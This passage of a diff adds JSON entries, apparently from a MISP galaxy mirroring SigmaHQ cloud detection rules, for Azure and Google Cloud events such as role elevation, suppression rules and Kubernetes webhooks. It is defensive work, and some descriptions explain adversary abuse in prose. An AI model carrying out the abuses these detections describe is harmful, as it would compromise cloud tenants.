"https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_security_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "d22b4df4-5a67-4859-a578-8c9a0b5af9df", + "value": "Azure Network Security Configuration Modified or Deleted" + }, + { + "description": "Identifies when a virtual network device is being modified or deleted.\nThis can be a network interface, network virtual appliance, virtual hub, or virtual router.\n", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/08", + "falsepositive": [ + "Virtual Network Device being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Virtual Network Device modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_network_virtual_device_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_virtual_device_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "15ef3fac-f0f0-4dc4-ada0-660aa72980b3", + "value": "Azure Virtual Network Device Modified or Deleted" + }, + { + "description": "Identifies when a new cloudshell is created inside of Azure portal.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/09/21", + "falsepositive": [ + "A new cloudshell may be created by a system administrator." + ], + "filename": "azure_new_cloudshell_created.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_new_cloudshell_created.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "72af37e2-ec32-47dc-992b-bc288a2708cb", + "value": "Azure New CloudShell Created" + }, + { + "description": "Identifies when a owner is was removed from a application or service principal in Azure.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/03", + "falsepositive": [ + "Owner being removed may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Owner removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_owner_removed_from_application_or_service_principal.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_owner_removed_from_application_or_service_principal.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "636e30d5-3736-42ea-96b1-e6e2f8429fd6", + "value": "Azure Owner Removed From Application or Service Principal" + }, + { + "description": "Detects when a PIM elevation is approved or denied. Outside of normal operations should be investigated.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", + "creation_date": "2022/08/09", + "falsepositive": [ + "Actual admin using PIM." + ], + "filename": "azure_pim_activation_approve_deny.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_pim_activation_approve_deny.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1078" + ] + }, + "uuid": "039a7469-0296-4450-84c0-f6966b16dc6d", + "value": "PIM Approvals And Deny Elevation" + }, + { + "description": "Detects when PIM alerts are set to disabled.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", + "creation_date": "2022/08/09", + "falsepositive": [ + "Administrator disabling PIM alerts as an active choice." + ], + "filename": "azure_pim_alerts_disabled.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_pim_alerts_disabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1484" + ] + }, + "uuid": "aeaef14c-e5bf-4690-a9c8-835caad458bd", + "value": "PIM Alert Setting Changes To Disabled" + }, + { + "description": "Detects when changes are made to PIM roles", + "meta": { + "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", + "creation_date": "2022/08/09", + "falsepositive": [ + "Legit administrative PIM setting configuration changes" + ], + "filename": "azure_pim_change_settings.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_pim_change_settings.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1078" + ] + }, + "uuid": "db6c06c4-bf3b-421c-aa88-15672b88c743", + "value": "Changes To PIM Settings" + }, + { + "description": "Detects when a user is added to a privileged role.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", + "creation_date": "2022/08/06", + "falsepositive": [ + "Legtimate administrator actions of adding members from a role" + ], + "filename": "azure_priviledged_role_assignment_add.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_priviledged_role_assignment_add.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "49a268a4-72f4-4e38-8a7b-885be690c5b5", + "value": "User Added To Privilege Role" + }, + { + "description": "Detects when a user is removed from a privileged role. Bulk changes should be investigated.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", + "creation_date": "2022/08/05", + "falsepositive": [ + "Legtimate administrator actions of removing members from a role" + ], + "filename": "azure_priviledged_role_assignment_bulk_change.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_priviledged_role_assignment_bulk_change.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "102e11e3-2db5-4c9e-bc26-357d42585d21", + "value": "Bulk Deletion Changes To Privileged Account Permissions" + }, + { + "description": "Detects when a new admin is created.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H', Tim Shelton", + "creation_date": "2022/08/11", + "falsepositive": [ + "A legitimate new admin account being created" + ], + "filename": "azure_privileged_account_creation.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#changes-to-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_privileged_account_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1078" + ] + }, + "uuid": "f7b5b004-dece-46e4-a4a5-f6fd0e1c6947", + "value": "Privileged Account Creation" + }, + { + "description": "Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used.", + "meta": { + "author": "sawwinnnaung", + "creation_date": "2020/05/07", + "falsepositive": [ + "Valid change" + ], + "filename": "azure_rare_operations.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/RareOperations.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_rare_operations.yml" + ], + "tags": [ + "attack.t1003" + ] + }, + "uuid": "c1182e02-49a3-481c-b3de-0fadc4091488", + "value": "Rare Subscription-level Operations In Azure" + }, + { + "description": "Identifies when a service principal is created in Azure.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/02", + "falsepositive": [ + "Service principal being created may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Service principal created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_service_principal_created.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_service_principal_created.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "0ddcff6d-d262-40b0-804b-80eb592de8e3", + "value": "Azure Service Principal Created" + }, + { + "description": "Identifies when a service principal was removed in Azure.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/03", + "falsepositive": [ + "Service principal being removed may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Service principal removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_service_principal_removed.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_service_principal_removed.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "448fd1ea-2116-4c62-9cde-a92d120e0f08", + "value": "Azure Service Principal Removed" + }, + { + "description": "Detects when a user has been elevated to manage all Azure Subscriptions.\nThis change should be investigated immediately if it isn't planned.\nThis setting could allow an attacker access to Azure subscriptions in your environment.\n", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/11/26", + "falsepositive": [ + "If this was approved by System Administrator." + ], + "filename": "azure_subscription_permissions_elevation_via_activitylogs.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftauthorization", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_subscription_permissions_elevation_via_activitylogs.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ] + }, + "uuid": "09438caa-07b1-4870-8405-1dbafe3dad95", + "value": "Azure Subscription Permission Elevation Via ActivityLogs" + }, + { + "description": "Detects when a user has been elevated to manage all Azure Subscriptions.\nThis change should be investigated immediately if it isn't planned.\nThis setting could allow an attacker access to Azure subscriptions in your environment.\n", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/11/26", + "falsepositive": [ + "If this was approved by System Administrator." + ], + "filename": "azure_subscription_permissions_elevation_via_auditlogs.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#assignment-and-elevation", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_subscription_permissions_elevation_via_auditlogs.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ] + }, + "uuid": "ca9bf243-465e-494a-9e54-bf9fc239057d", + "value": "Azure Subscription Permission Elevation Via AuditLogs" + }, + { + "description": "Identifies when a suppression rule is created in Azure. Adversary's could attempt this to evade detection.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/08/16", + "falsepositive": [ + "Suppression Rule being created may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Suppression Rule created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_suppression_rule_created.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_suppression_rule_created.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "92cc3e5d-eb57-419d-8c16-5c63f325a401", + "value": "Azure Suppression Rule Created" + }, + { + "description": "Detects when a temporary access pass (TAP) is added to an account. TAPs added to priv accounts should be investigated", + "meta": { + "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", + "creation_date": "2022/08/10", + "falsepositive": [ + "Administrator adding a legitmate temporary access pass" + ], + "filename": "azure_tap_added.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#changes-to-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_tap_added.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1078" + ] + }, + "uuid": "fa84aaf5-8142-43cd-9ec2-78cfebf878ce", + "value": "Temporary Access Pass Added To An Account" + }, + { + "description": "Detects when there is a interruption in the authentication process.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/11/26", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_unusual_authentication_interruption.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_unusual_authentication_interruption.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ] + }, + "uuid": "8366030e-7216-476b-9927-271d79f13cf3", + "value": "Azure Unusual Authentication Interruption" + }, + { + "description": "Detect when users in your Azure AD tenant are authenticating to other Azure AD Tenants.", + "meta": { + "author": "MikeDuddington, '@dudders1'", + "creation_date": "2022/06/30", + "falsepositive": [ + "If this was approved by System Administrator." + ], + "filename": "azure_users_authenticating_to_other_azure_ad_tenants.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_users_authenticating_to_other_azure_ad_tenants.yml" + ], + "tags": [ + "attack.t1078" + ] + }, + "uuid": "5f521e4b-0105-4b72-845b-2198a54487b9", + "value": "Users Authenticating To Other Azure AD Tenants" + }, + { + "description": "Detect access has been blocked by Conditional Access policies.\nThe access policy does not allow token issuance which might be sights≈ of unauthorizeed login to valid accounts.\n", + "meta": { + "author": "AlertIQ", + "creation_date": "2021/10/10", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_user_login_blocked_by_conditional_access.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_user_login_blocked_by_conditional_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110" + ] + }, + "uuid": "9a60e676-26ac-44c3-814b-0c2a8b977adf", + "value": "User Access Blocked by Azure Conditional Access" + }, + { + "description": "Detect when a user has reset their password in Azure AD", + "meta": { + "author": "YochanaHenderson, '@Yochana-H'", + "creation_date": "2022/08/03", + "falsepositive": [ + "If this was approved by System Administrator or confirmed user action." + ], + "filename": "azure_user_password_change.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_user_password_change.yml" + ], + "tags": [ + "attack.t1078" + ] + }, + "uuid": "340ee172-4b67-4fb4-832f-f961bdc1f3aa", + "value": "Password Reset By User Account" + }, + { + "description": "Identifies when a Virtual Network is modified or deleted in Azure.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/08", + "falsepositive": [ + "Virtual Network being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Virtual Network modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_virtual_network_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_virtual_network_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "bcfcc962-0e4a-4fd9-84bb-a833e672df3f", + "value": "Azure Virtual Network Modified or Deleted" + }, + { + "description": "Identifies when a VPN connection is modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/08", + "falsepositive": [ + "VPN Connection being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "VPN Connection modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_vpn_connection_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_vpn_connection_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "61171ffc-d79c-4ae5-8e10-9323dba19cd3", + "value": "Azure VPN Connection Modified or Deleted" + }, + { + "description": "Detects when storage bucket is enumerated in Google Cloud.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/14", + "falsepositive": [ + "Storage Buckets being enumerated may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Storage Buckets enumerated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "gcp_bucket_enumeration.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://cloud.google.com/storage/docs/json_api/v1/buckets", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_bucket_enumeration.yml" + ], + "tags": [ + "attack.discovery" + ] + }, + "uuid": "e2feb918-4e77-4608-9697-990a1aaf74c3", + "value": "Google Cloud Storage Buckets Enumeration" + }, + { + "description": "Detects when storage bucket is modified or deleted in Google Cloud.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/14", + "falsepositive": [ + "Storage Buckets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Storage Buckets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "gcp_bucket_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://cloud.google.com/storage/docs/json_api/v1/buckets", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_bucket_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "4d9f2ee2-c903-48ab-b9c1-8c0f474913d0", + "value": "Google Cloud Storage Buckets Modified or Deleted" + }, + { + "description": "Identifies when sensitive information is re-identified in google Cloud.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/15", + "falsepositive": [ + "Unknown" + ], + "filename": "gcp_dlp_re_identifies_sensitive_information.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://cloud.google.com/dlp/docs/reference/rest/v2/projects.content/reidentify", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_dlp_re_identifies_sensitive_information.yml" + ], + "tags": [ + "attack.impact", + "attack.t1565" + ] + }, + "uuid": "234f9f48-904b-4736-a34c-55d23919e4b7", + "value": "Google Cloud Re-identifies Sensitive Information" + }, + { + "description": "Identifies when a DNS Zone is modified or deleted in Google Cloud.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/15", + "falsepositive": [ + "Unknown" + ], + "filename": "gcp_dns_zone_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://cloud.google.com/dns/docs/reference/v1/managedZones", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "28268a8f-191f-4c17-85b2-f5aa4fa829c3", + "value": "Google Cloud DNS Zone Modified or Deleted" + }, + { + "description": "Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP).", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/13", + "falsepositive": [ + "Firewall rules being modified or deleted may be performed by a system administrator. Verify that the firewall configuration change was expected.", + "Exceptions can be added to this rule to filter expected behavior." + ], + "filename": "gcp_firewall_rule_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", + "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.Firewalls.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ] + }, + "uuid": "fe513c69-734c-4d4a-8548-ac5f609be82b", + "value": "Google Cloud Firewall Modified or Deleted" + }, + { + "description": "Identifies potential full network packet capture in gcp. This feature can potentially be abused to read sensitive data from unencrypted internal traffic.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/13", + "falsepositive": [ + "Full Network Packet Capture may be done by a system or network administrator.", + "If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "gcp_full_network_traffic_packet_capture.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", + "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml" + ], + "tags": [ + "attack.collection", + "attack.t1074" + ] + }, + "uuid": "980a7598-1e7f-4962-9372-2d754c930d0e", + "value": "Google Full Network Traffic Packet Capture" + }, + { + "description": "Identifies when an admission controller is executed in GCP Kubernetes.\nA Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server.\nThe behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster.\nAn adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster.\nFor example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials.\nAn adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.\n", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/11/25", + "falsepositive": [ + "Google Cloud Kubernetes Admission Controller may be done by a system administrator.", + "If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "gcp_kubernetes_admission_controller.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://cloud.google.com/kubernetes-engine/docs", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_admission_controller.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1078", + "attack.credential_access", + "attack.t1552", + "attack.t1552.007" + ] + }, + "uuid": "6ad91e31-53df-4826-bd27-0166171c8040", + "value": "Google Cloud Kubernetes Admission Controller" + }, + { + "description": "Identifies when a Google Cloud Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate.\nKubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs.\nAn Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.\n", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/11/22", + "falsepositive": [ + "Google Cloud Kubernetes CronJob/Job may be done by a system administrator.", + "If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "gcp_kubernetes_cronjob.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://cloud.google.com/kubernetes-engine/docs", + "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/", + "https://kubernetes.io/docs/concepts/workloads/controllers/job/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_cronjob.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.execution" + ] + }, + "uuid": "cd3a808c-c7b7-4c50-a2f3-f4cfcd436435", + "value": "Google Cloud Kubernetes CronJob" + }, + { + "description": "Detects the creation or patching of potential malicious RoleBinding. This includes RoleBindings and ClusterRoleBinding.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/09", + "falsepositive": [ + "RoleBindings and ClusterRoleBinding being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "RoleBindings and ClusterRoleBinding modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "gcp_kubernetes_rolebinding.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://github.com/elastic/detection-rules/pull/1267", + "https://kubernetes.io/docs/reference/kubernetes-api/authorization-resources/cluster-role-v1/#ClusterRole", + "https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control", + "https://kubernetes.io/docs/reference/access-authn-authz/rbac/", + "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_rolebinding.yml" + ], + "tags": [ + "attack.credential_access" + ] + }, + "uuid": "0322d9f2-289a-47c2-b5e1-b63c90901a3e", + "value": "Google Cloud Kubernetes RoleBinding" + }, + { + "description": "Identifies when the Secrets are Modified or Deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/09", + "falsepositive": [ + "Secrets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "gcp_kubernetes_secrets_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_secrets_modified_or_deleted.yml" + ], + "tags": [ + "attack.credential_access" + ] + }, + "uuid": "2f0bae2d-bf20-4465-be86-1311addebaa3", + "value": "Google Cloud Kubernetes Secrets Modified or Deleted" + }, + { + "description": "Identifies when a service account is disabled or deleted in Google Cloud.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/14", + "falsepositive": [ + "Service Account being disabled or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Service Account disabled or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "gcp_service_account_disabled_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_service_account_disabled_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.t1531" + ] + }, + "uuid": "13f81a90-a69c-4fab-8f07-b5bb55416a9f", + "value": "Google Cloud Service Account Disabled or Deleted" + }, + { + "description": "Identifies when a service account is modified in Google Cloud.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/14", + "falsepositive": [ + "Service Account being modified may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Service Account modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "gcp_service_account_modified.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_service_account_modified.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "6b67c12e-5e40-47c6-b3b0-1e6b571184cc", + "value": "Google Cloud Service Account Modified" + }, + { + "description": "Detect when a Cloud SQL DB has been modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/10/15", + "falsepositive": [ + "SQL Database being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "SQL Database modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "gcp_sql_database_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://cloud.google.com/sql/docs/mysql/admin-api/rest/v1beta4/users/update", + 